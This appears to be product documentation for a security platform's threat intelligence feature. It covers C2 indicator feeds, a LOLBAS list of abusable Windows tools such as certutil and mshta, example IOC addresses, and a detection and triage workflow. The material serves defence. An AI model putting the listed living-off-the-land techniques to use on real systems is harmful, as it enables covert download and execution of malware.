Skip to main content

Threat Intelligence

What is Threat Intelligence?

Threat Intelligence in Tripl-i provides automated integration with trusted security data sources to identify known malicious software, network infrastructure, and attack patterns. This data powers the security detection capabilities across the platform.

Why Threat Intelligence Matters

  • Stay Current: Threat landscape changes daily with new malware variants
  • Expert Curation: Leverage security researcher expertise without dedicated staff
  • Automated Updates: No manual IOC management required
  • Proven Data: Industry-trusted sources with verified threat data

Integrated Sources

ThreatFox (abuse.ch)

The primary source for malware command & control (C2) infrastructure.

MetricValue
Total IOCs51,877+
Malware Families160+
Unique IPs32,774+
Update FrequencyDaily
ConfidenceHigh (verified C2 servers)

Top Tracked Threats:

Malware FamilyIOC CountThreat Type
Xtreme RAT8,545Remote Access Trojan
Cobalt Strike8,099C2 Framework
Meterpreter2,517Post-exploitation
AsyncRAT2,282Remote Access Trojan
Sliver2,221C2 Framework
Remcos2,152Remote Access Trojan

LOLBAS (Living Off The Land)

Tracks legitimate Windows system tools that can be abused for malicious purposes.

MetricValue
Binaries Tracked200+
TechniquesProcess execution, download, bypass
MITRE MappingFull ATT&CK coverage

Common LOLBAS Tools:

  • certutil.exe - Download and decode files
  • mshta.exe - Execute HTA applications
  • regsvr32.exe - Proxy execution
  • rundll32.exe - Execute DLL functions
  • powershell.exe - Script execution

CISA KEV (Coming Soon)

Known Exploited Vulnerabilities catalog from the US Cybersecurity Agency.

  • Actively exploited vulnerabilities
  • Federal remediation deadlines
  • Vendor/product impact mapping

Understanding Threat Data

Indicators of Compromise (IOCs)

IOCs are forensic artifacts that indicate potential malicious activity:

IOC TypeExampleDetection Method
IP Address185.243.112.80Network connection monitoring
Domainmalware-c2.comDNS query analysis
URLhttp://bad.com/payloadWeb traffic inspection
File HashSHA256 fingerprintFile integrity checking
Processsuspicious.exeProcess monitoring

Confidence Levels

Each IOC has an associated confidence level:

LevelMeaningAction Recommendation
HighVerified maliciousImmediate response
MediumLikely maliciousInvestigation required
LowPotentially suspiciousMonitor and assess

Threat Types

Common threat classifications in the system:

TypeDescriptionRisk Level
RansomwareEncrypts files for ransomCritical
BotnetPart of coordinated attack networkCritical
RATRemote Access TrojanCritical
C2 FrameworkCommand & Control toolsCritical
BackdoorUnauthorized access mechanismHigh
TrojanDisguised malicious softwareHigh
SpywareInformation stealing malwareHigh
RootkitDeep system compromiseCritical

Viewing Threat Intelligence

Policy Details

Each software policy sourced from threat intelligence includes:

  1. Source Information: Which feed provided the data
  2. Last Updated: When the data was refreshed
  3. IOC Count: Number of indicators associated
  4. Threat Notes: Context about the threat

Network IOC Details

For policies with network indicators:

  • IP Addresses: Known C2 server IPs
  • Ports: Communication ports used
  • Direction: Inbound, outbound, or both
  • Last Seen: Most recent observation date

Data Quality

Why We Choose These Sources

CriteriaThreatFoxLOLBAS
ReputationIndustry standardCommunity trusted
False Positive RateVery lowLow (context-dependent)
Update SpeedReal-timeCommunity-driven
VerificationSecurity researcher verifiedDocumented techniques
CoverageC2 infrastructureSystem tool abuse

Sources We Avoid

Not all threat feeds are equal. We specifically avoid sources with:

  • High false positive rates
  • Unverified submissions
  • Short retention windows (48-hour lists)
  • Mixed attack types (SSH brute force mixed with C2)

Threat Intelligence in Action

Detection Workflow

1. Threat feed updated with new Cobalt Strike C2 IP

2. Tripl-i imports IOC into Software Policy

3. Network scan runs for tenant

4. Connection to C2 IP detected

5. Security event created with full context

6. Notification sent to security team

Example Detection

When a workstation connects to a known Cobalt Strike server:

Event Details:

  • Title: Network IOC Detected: Cobalt Strike C2
  • Severity: Critical
  • Host: WORKSTATION-001
  • Remote IP: 47.95.207.79:443
  • Process: svchost.exe
  • Action Required: Immediate investigation

Best Practices

Interpreting Detections

  1. Verify the Connection: Confirm the network connection exists
  2. Check the Process: Is it a legitimate process or suspicious?
  3. Review Context: What was the user doing?
  4. Assess Impact: What data could be compromised?
  5. Contain if Needed: Isolate the system if confirmed

Reducing False Positives

  • Some legitimate services may share hosting with malicious infrastructure
  • Cloud provider IPs may have historical malicious associations
  • Add exclusions for verified false positives
  • Document exclusion decisions for audit

Staying Informed

  • Review critical severity detections immediately
  • Trend high-severity detections weekly
  • Audit medium/low severity monthly
  • Update exclusion lists as needed

Frequently Asked Questions

Q: How current is the threat data? A: Threat intelligence feeds are updated daily. Critical threats may be updated more frequently.

Q: Can I add my own threat indicators? A: Yes, create manual software policies with custom IOCs through the UI.

Q: What if a detection is a false positive? A: Add an exclusion to the policy and document the reason. The system will stop alerting on that specific combination.

Q: Are all detections confirmed compromises? A: No, detections indicate connections to known malicious infrastructure. Investigation is required to confirm actual compromise.